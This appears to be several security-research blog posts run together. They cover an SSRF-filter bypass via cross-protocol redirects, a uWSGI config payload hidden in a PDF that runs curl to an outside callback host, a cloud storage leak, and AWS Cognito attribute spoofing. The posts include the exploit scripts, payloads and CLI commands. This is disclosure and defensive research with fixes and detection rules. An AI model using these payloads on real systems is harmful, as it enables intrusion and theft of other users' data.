Server Side Request Forgery (SSRF) is a fairly well-known vulnerability with established prevention methods. So imagine my surprise when I bypassed an SSRF mitigation during a routine retest. Even worse, I bypassed a filter that we had recommended ourselves! I couldn’t let it slip and had to get to the bottom of the issue.
Server Side Request Forgery is a vulnerability in which a malicious actor exploits a victim server to perform HTTP(S) requests on the attacker’s behalf. Since the server usually has access to the internal network, this attack is useful to bypass firewalls and IP whitelists to access hosts otherwise inaccessible to the attacker.
SSRF attacks can be prevented with address filtering, assuming there are no filter bypasses. One of the classic SSRF filtering bypass techniques is a redirection attack. In these attacks, an attacker sets up a malicious webserver serving an endpoint redirecting to an internal address. The victim server properly allows sending a request to an external server, but then blindly follows a malicious redirection to an internal service.
None of the above is new, of course. These techniques have been around for years, and any reputable anti-SSRF library mitigates such risks. And yet, I bypassed it.
The client’s code was a simple endpoint created for an integration. During the original engagement there was no filtering at all. After our test, the client applied the anti-SSRF library ssrf-req-filter. For research and code anonymity purposes, I extracted the logic into a standalone Node.js script:
const request = require('request');
const ssrfFilter = require('ssrf-req-filter');

let url = process.argv[2];
console.log("Testing", url);

request({
    uri: url,
    agent: ssrfFilter(url),
}, function (error, response, body) {
    console.error('error:', error);
    console.log('statusCode:', response && response.statusCode);
});
To verify a redirect bypass, I created a simple webserver with an open-redirect endpoint in PHP and hosted it on the Internet using my test domain tellico.fun:
<?php header('Location: '.$_GET["target"]); ?>
The initial test demonstrates that the vulnerability is fixed:
$ node test-request.js "http://tellico.fun/redirect.php?target=http://localhost/test"
Testing http://tellico.fun/redirect.php?target=http://localhost/test
error: Error: Call to 127.0.0.1 is blocked.
But then, I switched the protocol and suddenly I was able to access a localhost service again. Readers should look carefully at the payload, as the difference is minimal:
$ node test-request.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
error: null
statusCode: 200
What happened? The attacker’s server redirected the request to another protocol - from HTTPS to HTTP. This is all it took to bypass the anti-SSRF protection.
Why is that? After some digging in the popular request library codebase, I discovered the following lines in the lib/redirect.js file:
// handle the case where we change protocol from https to http or vice versa
if (request.uri.protocol !== uriPrev.protocol) {
    delete request.agent
}
According to the code above, anytime a redirect causes a protocol switch, the request agent is deleted. Without this workaround, the client would fail anytime a server caused a cross-protocol redirect, since the native Node.js http(s).Agent cannot be used with both protocols.
Unfortunately, such behavior also discards any event handling associated with the agent. Given that the SSRF prevention is based on the agent’s createConnection handler, this unexpected behavior undermines the effectiveness of SSRF mitigation strategies in the request library.
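To illustrate the impact, here is a minimal sketch (not the actual ssrf-req-filter source) of how an agent-based SSRF filter typically works: the allow/deny decision lives inside the agent’s createConnection handler, so once the agent is dropped during a cross-protocol redirect, the check disappears with it. The FilteringAgent class and isPrivateAddress helper below are hypothetical names used only for illustration.

const http = require('http');
const dns = require('dns');

// Hypothetical helper: decides whether a resolved address is loopback/internal.
function isPrivateAddress(address) {
    return address === '127.0.0.1' || address === '::1' || address.startsWith('10.');
}

// Sketch of an agent-based SSRF filter: the check runs when the socket is created.
class FilteringAgent extends http.Agent {
    createConnection(options, callback) {
        dns.lookup(options.host, (err, address) => {
            if (err) return callback(err);
            if (isPrivateAddress(address)) {
                return callback(new Error(`Call to ${address} is blocked.`));
            }
            // Delegate to the default implementation for allowed destinations.
            callback(null, super.createConnection({ ...options, host: address }));
        });
    }
}

// Usage: request({ uri: url, agent: new FilteringAgent() }, callback)
// If `request.agent` is deleted mid-redirect, Node.js falls back to the default
// global agent and this createConnection check is never invoked again.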
This issue was disclosed to the maintainers on December 5th, 2022. Despite our best attempts, we have not yet received an acknowledgment. After the 90-day mark, we decided to publish the full technical details, together with a public GitHub issue linked to a pull request for the fix. On March 14th, 2023, a CVE ID was assigned to this vulnerability.
Since a supposedly universal filter turned out to be so dependent on the implementation of the HTTP(S) client, it is natural to ask how other popular libraries handle these cases.
The node-fetch library also allows overriding the HTTP(S) agent within its options, without specifying the protocol:
const ssrfFilter = require('ssrf-req-filter');
const fetch = (...args) => import('node-fetch').then(({ default: fetch }) => fetch(...args));

let url = process.argv[2];
console.log("Testing", url);

fetch(url, {
    agent: ssrfFilter(url)
}).then((response) => {
    console.log('Success');
}).catch(error => {
    console.log(`${error.toString().split('\n')[0]}`);
});
Contrary to the request library though, it simply fails in the case of a cross-protocol redirect:
$ node fetch.js "https://tellico.fun/redirect.php?target=http://localhost/test"
Testing https://tellico.fun/redirect.php?target=http://localhost/test
TypeError [ERR_INVALID_PROTOCOL]: Protocol "http:" not supported. Expected "https:"
It is therefore impossible to perform a similar attack on this library.
The axios library’s options allow overriding the agents for both protocols separately. Therefore, the following code is protected:
axios.get(url, {
    httpAgent: ssrfFilter("http://domain"),
    httpsAgent: ssrfFilter("https://domain")
})
Note: In the axios library, it is necessary to hardcode the URLs when overriding the agents. Otherwise, one of the agents would be overwritten with an agent for the wrong protocol, and the cross-protocol redirect would fail similarly to the node-fetch library.
Still, axios calls can be vulnerable. If one forgets to override both agents, a cross-protocol redirect can bypass the filter:
axios.get(url, {
    // httpAgent: ssrfFilter(url),
    httpsAgent: ssrfFilter(url)
})
Such misconfigurations can be easily missed, so we have created a Semgrep rule that catches similar patterns in JavaScript code:
rules:
  - id: axios-only-one-agent-set
    message: Detected an Axios call that overwrites only one HTTP(S) agent. It can lead to a bypass of restriction implemented in the agent implementation. For example SSRF protection can be bypassed by a malicious server redirecting the client from HTTPS to HTTP (or the other way around).
    mode: taint
    pattern-sources:
      - patterns:
          - pattern-either:
              - pattern: |
                  {..., httpsAgent:..., ...}
              - pattern: |
                  {..., httpAgent:..., ...}
          - pattern-not: |
              {...,httpAgent:...,httpsAgent:...}
    pattern-sinks:
      - pattern: $AXIOS.request(...)
      - pattern: $AXIOS.get(...)
      - pattern: $AXIOS.delete(...)
      - pattern: $AXIOS.head(...)
      - pattern: $AXIOS.options(...)
      - pattern: $AXIOS.post(...)
      - pattern: $AXIOS.put(...)
      - pattern: $AXIOS.patch(...)
    languages:
      - javascript
      - typescript
    severity: WARNING
As discussed above, we discovered an exploitable SSRF vulnerability in the popular request library. Although this package has been deprecated, it is still used by over 50k projects, with over 18M downloads per week.
We demonstrated how an attacker can bypass any anti-SSRF mechanisms injected into this library by simply redirecting the request to another protocol (e.g. HTTP to HTTPS, or vice versa). While many libraries we reviewed did provide protection from such attacks, others such as axios could potentially be vulnerable when similar misconfigurations exist. In an effort to make these issues easier to find and avoid, we have also released our internal Semgrep rule.
Arbitrary file write (AFW) vulnerabilities in web application uploads can be a powerful tool for an attacker, potentially allowing them to escalate their privileges and even achieve remote code execution (RCE) on the server. However, the specific tactics that can be used to achieve this escalation often depend on the specific scenario faced by the attacker. In the wild, there can be several scenarios that an attacker may encounter when attempting to escalate from AFW to RCE in web applications. These can generically be categorized as:
A plethora of tactics have been used in the past to achieve RCE through AFW in moderately hardened environments (in applications running as unprivileged users):
- Overwriting application or web server configuration files (e.g., .htaccess, .config, web.config, httpd.conf, __init__.py and .xml)
- Writing server-side executable files parsed by the application runtime (e.g., .php, .asp, .jsp files)
- Overwriting libraries or binaries within the application’s virtual environment (venv)
- Overwriting shell startup files (.bashrc, .bash-profile and .profile)
- Overwriting authorized_keys and authorized_keys2 - to gain SSH access
It’s important to note that only a very small set of these tactics can be used in cases of partial control over the file contents in web applications (e.g., PHP, ASP or temp files). The specific methods used will depend on the specific application and server configuration, so it is important to understand the unique vulnerabilities and attack vectors that are present in the victims’ systems.
The following write-up illustrates a real-world chain of distinct vulnerabilities to obtain arbitrary command execution during one of our engagements, which resulted in the discovery of a new method. This is particularly useful in case an attacker has only partial control over the injected file contents (“dirty write”) or when server-side transformations are performed on its contents.
In our scenario, the application had a vulnerable endpoint through which an attacker was able to perform a Path Traversal and write/delete files via a PDF export feature. Its associated function was responsible for deleting any pre-existing file at the target path and then writing the exported PDF contents there.
The attack was limited since it could only impact files writable by the application user, and all of the application files were read-only. While an attacker could already use the vulnerability to first delete the logs or on-file databases, no higher impact was possible at first glance. By looking at the directory, the following file was also available:
drwxrwxr-x 6 root root 4096 Nov 18 13:48 .
-rw-rw-r-- 1 webuser webuser 373 Nov 18 13:46 /app/console/uwsgi-sockets.ini
The victim’s application was deployed through a uWSGI application server (v2.0.15) fronting the Flask-based application, acting as a process manager and monitor. uWSGI can be configured using several different methods, supporting loading configuration files via simple disk files (.ini). The uWSGI native function responsible for parsing these files is defined in core/ini.c:128. The configuration file is initially read in full into memory and scanned to locate the string indicating the start of a valid uWSGI configuration (“[uwsgi]”):
while (len) {
    ini_line = ini_get_line(ini, len);
    if (ini_line == NULL) {
        break;
    }
    lines++;

    // skip empty line
    key = ini_lstrip(ini);
    ini_rstrip(key);
    if (key[0] != 0) {
        if (key[0] == '[') {
            section = key + 1;
            section[strlen(section) - 1] = 0;
        }
        else if (key[0] == ';' || key[0] == '#') {
            // this is a comment
        }
        else {
            // val is always valid, but (obviously) can be ignored
            val = ini_get_key(key);
            if (!strcmp(section, section_asked)) {
                got_section = 1;
                ini_rstrip(key);
                val = ini_lstrip(val);
                ini_rstrip(val);
                add_exported_option((char *) key, val, 0);
            }
        }
    }

    len -= (ini_line - ini);
    ini += (ini_line - ini);
}
More importantly, uWSGI configuration files can also include “magic” variables, placeholders and operators defined with a precise syntax. The ‘@’ operator in particular is used in the form of @(filename) to include the contents of a file. Many uWSGI schemes are supported, including “exec” - useful to read from a process’s standard output. These operators can be weaponized for Remote Command Execution or Arbitrary File Write/Read when a .ini configuration file is parsed:
[uwsgi]
; read from a symbol
foo = @(sym://uwsgi_funny_function)
; read from binary appended data
bar = @(data://0)
; read from http
test = @(http://doyensec.com/hello)
; read from a file descriptor
content = @(fd://3)
; read from a process stdout
body = @(exec://whoami)
; call a function returning a char *
characters = @(call://uwsgi_func)
While abusing the above .ini files is a good vector, an attacker would still need a way to reload the configuration (such as triggering a restart of the service via a second DoS bug or waiting for the server to restart). In order to help with this, a standard uWSGI deployment configuration flag could ease the exploitation of the bug. In certain cases, the uWSGI configuration can specify a py-auto-reload development option, for which the Python modules are monitored within a user-determined time span (3 seconds in this case), specified as an argument. If a change is detected, it will trigger a reload, e.g.:
[uwsgi]
home = /app
uid = webapp
gid = webapp
chdir = /app/console
socket = 127.0.0.1:8001
wsgi-file = /app/console/uwsgi-sockets.py
gevent = 500
logto = /var/log/uwsgi/%n.log
harakiri = 30
vacuum = True
py-auto-reload = 3
callable = app
pidfile = /var/run/uwsgi-sockets-console.pid
log-maxsize = 100000000
log-backupname = /var/log/uwsgi/uwsgi-sockets.log.bak
In this scenario, directly writing malicious Python code inside the PDF won’t work, since the Python interpreter will fail when encountering the PDF’s binary data. On the other hand, overwriting a .py file with any data will trigger the uWSGI configuration file to be reloaded.
In our PDF-exporting scenario, we had to craft a polymorphic, syntactically valid PDF file containing our valid multi-line .ini configuration file. The .ini payload had to be preserved during the merging with the PDF template. We were able to embed the multiline .ini payload inside the EXIF metadata of an image included in the PDF. To build this polyglot file we used the following script:
from fpdf import FPDF
from exiftool import ExifToolHelper

# Embed the multi-line uWSGI payload inside the EXIF "model" tag of the image
with ExifToolHelper() as et:
    et.set_tags(
        ["doyensec.jpg"],
        tags={"model": """
[uwsgi]
foo = @(exec://curl http://collaborator-unique-host.oastify.com)
"""},
        params=["-E", "-overwrite_original"]
    )

class MyFPDF(FPDF):
    pass

# Build the PDF and include the image carrying the payload
pdf = MyFPDF()
pdf.add_page()
pdf.image('./doyensec.jpg')
pdf.output('payload.pdf', 'F')
This metadata will be part of the file written on the server. In our exploitation, the eager loading of uWSGI picked up the new configuration and executed our curl payload. The payload can be tested locally with the following command:
uwsgi --ini payload.pdf
Let’s exploit it on the web server with the following steps:
1. Write the polyglot payload.pdf into /app/console/uwsgi-sockets.ini via the path traversal
2. Overwrite any .py file to trigger py-auto-reload and make uWSGI re-parse its configuration
3. Verify the execution of curl by checking for the interaction on Burp Collaborator
As highlighted in this article, we introduced a new uWSGI-based technique. It comes in addition to the tactics already used in various scenarios by attackers to escalate from arbitrary file write (AFW) vulnerabilities in web application uploads to remote code execution (RCE). These techniques are constantly evolving with the server technologies, and new methods will surely be popularized in the future. This is why it is important to share the known escalation vectors with the research community. We encourage researchers to continue sharing information on known vectors, and to continue searching for new, less popular vectors.
We are releasing an internal tool to speed up testing and reporting efforts in complex functional flows. We’re excited to announce that PESD Exporter is now available on GitHub.
Modern web platform design involves integrations with other applications and cloud services to add functionalities, share data and enrich the user experience. The resulting functional flows are characterized by multiple state-changing steps with complex trust boundaries and responsibility separation among the involved actors.
In such situations, web security specialists have to manually model sequence diagrams if they want to support their analysis with visualizations of the whole functionality logic.
We all know that constructing sequence diagrams by hand is tedious, error-prone, time-consuming and sometimes even impractical (dealing with more than ten messages in a single flow).
Proxy Enriched Sequence Diagrams (PESD) is our internal Burp Suite extension to visualize web traffic in a way that facilitates the analysis and reporting in scenarios with complex functional flows.
A Proxy Enriched Sequence Diagram (PESD) is a specific message syntax for sequence diagram models adapted to bring enriched information about the represented HTTP traffic. The MermaidJS sequence diagram syntax is used to render the final diagram.
While classic sequence diagrams for software engineering are meant for abstract visualization, with all the information carried by the diagram itself, PESD is designed to include granular information related to the underlying HTTP traffic being represented, in the form of metadata.
The Enriched part in the format name originates from the diagram-metadata linkability. In fact, the HTTP events in the diagram are marked with flags that can be used to access the specific information from the metadata.
As an example, URL query parameters will be found in the arrow events as UrlParams, expandable with a click.
Some key characteristics of the format:
The extension handles Burp Suite traffic conversion to the PESD format and offers the possibility of executing templates that will enrich the resulting exports.
Once loaded, sending items to the extension will directly result in an export with all the active settings.
Currently, two modes of operation are supported:
- multi-domain flows analysis
- single-domain flows analysis
- Expandable Metadata. Underlined flags can be clicked to show the underlying metadata from the traffic in a scrollable popover
- Masked Randoms in URL Paths. UUIDs and pseudorandom strings recognized inside path segments are mapped to variable names <UUID_N> / <VAR_N>. The re-rendering will reshape the diagram to improve flow readability. Every occurrence of the same value maintains the same name
- Notes. Comments from Burp Suite are converted to notes in the resulting diagram. Use <br> in Burp Suite comments to obtain multi-line notes in PESD exports
Save as:
- SVG format
- Markdown file (MermaidJS syntax)
- metadata in JSON format. Read about the metadata structure in the format definition page, “exports section”
PESD Exporter supports syntax and metadata extension via template execution. Currently supported templates are:
- OAuth2 / OpenID Connect: the template matches standard OAuth2/OpenID Connect flows and adds related flags + flow frame
- SAML SSO: the template matches Single Sign-On flows with SAML V2.0 and adds related flags + flow frame
Template matching example for SAML SP-initiated SSO with redirect POST:
The template engine also ensures consistency in the case of crossing flows and bad implementations. The current check prevents nested flow-frames, since they cannot be found in real-case scenarios. Nested or unclosed frames inside the resulting markdown are deleted and merged to allow MermaidJS rendering.
Note: Whenever the flow-frame is not displayed during an export involving the supported frameworks, a manual review is highly recommended. This behavior should be considered as a warning that the application is using a non-standard implementation.
Do you want to contribute by writing your own templates? Follow the template implementation guide.
PESD exports allow visualizing complex functionalities in their entirety while still providing access to the core parts of their underlying logic. The role of each actor can be easily derived and used to build a test plan before diving into Burp Suite.
It can also be used to spot differences from standard frameworks, thanks to the HTTP message syntax along with the OAuth2/OpenID and SAML SSO templates.
In particular, templates enable the tester to identify uncommon implementations by matching standard flows in the resulting diagram. By doing so, custom variations can be spotted with a glance.
The following detailed examples are extracted from our testing activities:
The major benefit of the research output was pairing the diagrams generated with PESD with the analysis of the vulnerability. The inclusion of PoC-specific exports in reports makes it possible to describe the issue in a straightforward way.
The export enables the tester to refer to a request in the flow by specifying its ID in the diagram and link it in the description. The vulnerability description can be adapted to different testing approaches:
Black Box Testing - The description can refer to the relevant sequence numbers in the flow along with the observed behavior and flaws;
White Box Testing - The description can refer directly to the endpoint’s handling function identified in the codebase. This result is particularly useful to help the reader in linking the code snippets with their position within the entire flow.
In that sense, PESD can positively affect the reporting style for vulnerabilities in complex functional flows.
The following basic example is extracted from one of our client engagements.
An internal (Intranet) Web Application used by the super-admins allowed privileged users within the application to obtain temporary access to customers’ accounts in the web facing platform.
In order to restrict the access to the customers’ data, the support access must be granted by the tenant admin in the web-facing platform. In this way, the admins of the internal application had user access only to organizations via a valid grant.
The following sequence diagram represents the traffic intercepted during a user impersonation access in the internal application:
The handling function of the first request (1) checked the presence of an access grant for the requested user’s tenant. If there were valid grants, it returned the redirection URL for an internal API defined in AWS’s API Gateway. The API was exposed only within the internal network accessible via VPN.
The second request (3) pointed to AWS’s API Gateway. The endpoint was handled by an AWS Lambda function taking as input the URL parameters containing tenantId, user_id, and others. The returned output contained the authentication details for the requested impersonation session: access_token, refresh_token and user_id. It should be noted that the internal API Gateway endpoint did not enforce authentication and authorization of the caller.
In the third request (5), the authentication details obtained were submitted to web-facing.platform.com and the session was set. After this step, the internal admin user was authenticated in the web-facing platform as the specified target user.
Within the described flow, the authentication and authorization checks (handling of request 1) were decoupled from the actual creation of the impersonated session (handling of request 3).
As a result, any employee with access to the internal network (VPN) was able to invoke the internal AWS API responsible for issuing impersonated sessions and obtain access to any user in the web-facing platform. By doing so, the need for valid super-admin access to the internal application (authentication) and for a specific target-user access grant (authorization) was bypassed.
Updates are coming. We are looking forward to receiving new improvement ideas to enrich PESD even further.
Feel free to contribute with pull requests, bug reports or enhancements.
This project was made with love in the Doyensec Research island by Francesco Lacerenza. The extension was developed during his internship with 50% research time.
The challenge for the data-import CloudSecTidbit is basically reading the content of an internal bucket. The frontend web application is using the targeted bucket to store the logo of the app.
The name of the bucket is returned to the client by calling the /variable endpoint:
$.ajax({
    type: 'GET',
    url: '/variable',
    dataType: 'json',
    success: function (data) {
        let source_internal = `https://${data}.s3.amazonaws.com/public-stuff/logo.png?${Math.random()}`;
        $(".logo_image").attr("src", source_internal);
    },
    error: function (jqXHR, status, err) {
        alert("Error getting variable name");
    }
});
The server will return something like:
"data-internal-private-20220705153355922300000001"
So the schema should be clear now. Let’s use the data import functionality and try to leak the content of the data-internal-private S3 bucket:
Then, by visiting the Data Gallery section, you will see the keys.txt and dummy.txt objects, which are stored within the internal bucket.
Amazon Web Services offers a complete solution for adding user sign-up, sign-in, and access control to web and mobile applications: Cognito. Let’s first talk about the service in general terms.
From AWS Cognito’s welcome page:
“Using the Amazon Cognito user pools API, you can create a user pool to manage directories and users. You can authenticate a user to obtain tokens related to user identity and access policies.”
Amazon Cognito collects a user’s profile attributes into directories called pools that an application uses to handle all authentication related tasks.
The two main components of Amazon Cognito are user pools and identity pools.
With a user pool, users can sign in to an app through Amazon Cognito, OAuth2, and SAML identity providers.
Each user has a profile that applications can access through the software development kit (SDK).
User attributes are pieces of information stored to characterize individual users, such as name, email address, and phone number. A new user pool has a set of default standard attributes. It is also possible to add custom attributes to satisfy custom needs.
An app is an entity within a user pool that has permission to call management operation APIs, such as those used for user registration, sign-in, and forgotten passwords.
In order to call the operation APIs, an app client ID and an optional client secret are needed. Multiple app integrations can be created for a single user pool, but typically, an app client corresponds to the platform of an app.
A user can be authenticated in different ways using Cognito, but the main options are:
- Client-side authentication flow, performed directly by the client application via the SDK
- Server-side authentication flow, performed from a backend using the AdminInitiateAuth API operation. This operation requires AWS credentials with permissions that include cognito-idp:AdminInitiateAuth and cognito-idp:AdminRespondToAuthChallenge. The operation returns the required authentication parameters.
In both cases, the end-user should receive the resulting JSON Web Token.
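For reference, the server-side flow can be exercised with the AWS CLI from a backend holding the proper AWS credentials. The pool ID, client ID and user credentials below are placeholders, and the example assumes the app client has the ADMIN_USER_PASSWORD_AUTH flow enabled:

$ aws cognito-idp admin-initiate-auth \
    --region us-east-1 \
    --user-pool-id us-east-1_EXAMPLE \
    --client-id EXAMPLECLIENTID \
    --auth-flow ADMIN_USER_PASSWORD_AUTH \
    --auth-parameters USERNAME=user@example.com,PASSWORD='ExamplePassw0rd!'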
After that first look at AWS Cognito, we can jump straight to the tidbit case.
For this case, we will focus on a vulnerability identified in a Web Platform that was using AWS Cognito.
The platform used Cognito to manage users and map them to their accounts in a third-party platform, X_platform, strictly interconnected with the provided service.
In particular, users were able to connect their X_platform account and allow the platform to fetch their X_platform data for later use. The access token (JWT) issued by Cognito for an authenticated user had the following decoded payload:
{
    "sub": "cf9..[REDACTED]",
    "device_key": "us-east-1_ab..[REDACTED]",
    "iss": "https://cognito-idp.us-east-1.amazonaws.com/us-east-1_..[REDACTED]",
    "client_id": "9..[REDACTED]",
    "origin_jti": "ab..[REDACTED]",
    "event_id": "d..[REDACTED]",
    "token_use": "access",
    "scope": "aws.cognito.signin.user.admin",
    "auth_time": [REDACTED],
    "exp": [REDACTED],
    "iat": [REDACTED],
    "jti": "3b..[REDACTED]",
    "username": "[REDACTED]"
}
In AWS Cognito, user tokens permit calls to all the User Pool APIs that can be hit using access tokens alone.
The permitted API definitions can be found here.
If the request syntax for the API call includes the parameter "AccessToken": "string", then the call allows users to modify something on their own UserPool entry with the previously inspected JWT.
The above-described design does not represent a vulnerability on its own, but allowing users to edit their own User Attributes in the pool could lead to severe impacts if the backend uses them to apply internal platform logic.
The user-associated data within the pool was fetched using the AWS CLI:
$ aws cognito-idp get-user --region us-east-1 --access-token eyJra..[REDACTED SESSION JWT]
{
    "Username": "[REDACTED]",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "cf915…[REDACTED]"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "[REDACTED]"
        },
        {
            "Name": "custom:X_platform_user_id",
            "Value": "[REDACTED ID]"
        },
        {
            "Name": "email",
            "Value": "[REDACTED]"
        }
    ]
}
After finding the X_platform_user_id user pool attribute, it was clear that it was there for a specific purpose. In fact, the platform was fetching the attribute and using it as the primary key to query the associated refresh_token in an internal database.
Attempting to spoof the attribute was as simple as executing:
$ aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:X_platform_user_id,Value=[ANOTHER REDACTED ID]" --access-token eyJra..[REDACTED SESSION JWT]
The attribute edit succeeded and the data from the other user started to flow into the attacker’s account. The platform trusted the attribute as immutable and used it to retrieve a refresh_token needed to fetch and show data from X_platform in the UI.
In AWS Cognito, App Integrations (Clients) have default read/write permissions on User Attributes.
The following image shows the “Attribute read and write permissions” configuration for a new App Integration within a User Pool.
Consequently, authenticated users are able to edit their own attributes by using the access token (JWT) and AWS CLI.
In conclusion, it is very important to know about such behavior and set the permissions correctly during the pool creation. Depending on the platform logic, some attributes should be set as read-only to make them trustable by internal flows.
While auditing cloud-driven web platforms, look for JWTs issued by AWS Cognito, then answer the following questions:
Remove write permissions for every platform-critical user attribute within App Integration for the used Users Pool (AWS Cognito).
By removing it, users will not be able to perform attribute updates using their access tokens.
Updates will be possible only via admin actions such as the admin-update-user-attributes method, which requires AWS credentials.
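For instance, with write permissions removed from the app client, changing a critical attribute would have to go through an administrative call along these lines (the pool ID, username and value are placeholders):

$ aws cognito-idp admin-update-user-attributes \
    --region us-east-1 \
    --user-pool-id us-east-1_EXAMPLE \
    --username target-user \
    --user-attributes Name=custom:X_platform_user_id,Value=[LEGITIMATE ID]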
+1 remediation tip: To avoid doing it by hand, apply the r/w config in your IaC and have the infrastructure correctly deployed. Terraform example:
resource "aws_cognito_user_pool" "my_pool" {
  name = "my_pool"
}

...

resource "aws_cognito_user_pool" "pool" {
  name = "pool"
}

resource "aws_cognito_user_pool_client" "client" {
  name = "client"

  user_pool_id = aws_cognito_user_pool.pool.id

  read_attributes  = ["email"]
  write_attributes = ["email"]
}
The given Terraform example file will create a pool where the client will have only read/write permissions on the “email” attribute. In fact, if at least one attribute is specified either in the read_attributes or write_attributes lists, the default r/w policy will be ignored.
By doing so, it is possible to strictly specify the attributes with read/write permissions while implicitly denying them on the non-specified ones.
Please ensure to properly handle email and phone number verification in the Cognito context. Since they may contain unverified values, remember to apply the RequireAttributesVerifiedBeforeUpdate parameter.
As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/
Stay tuned for the next episode!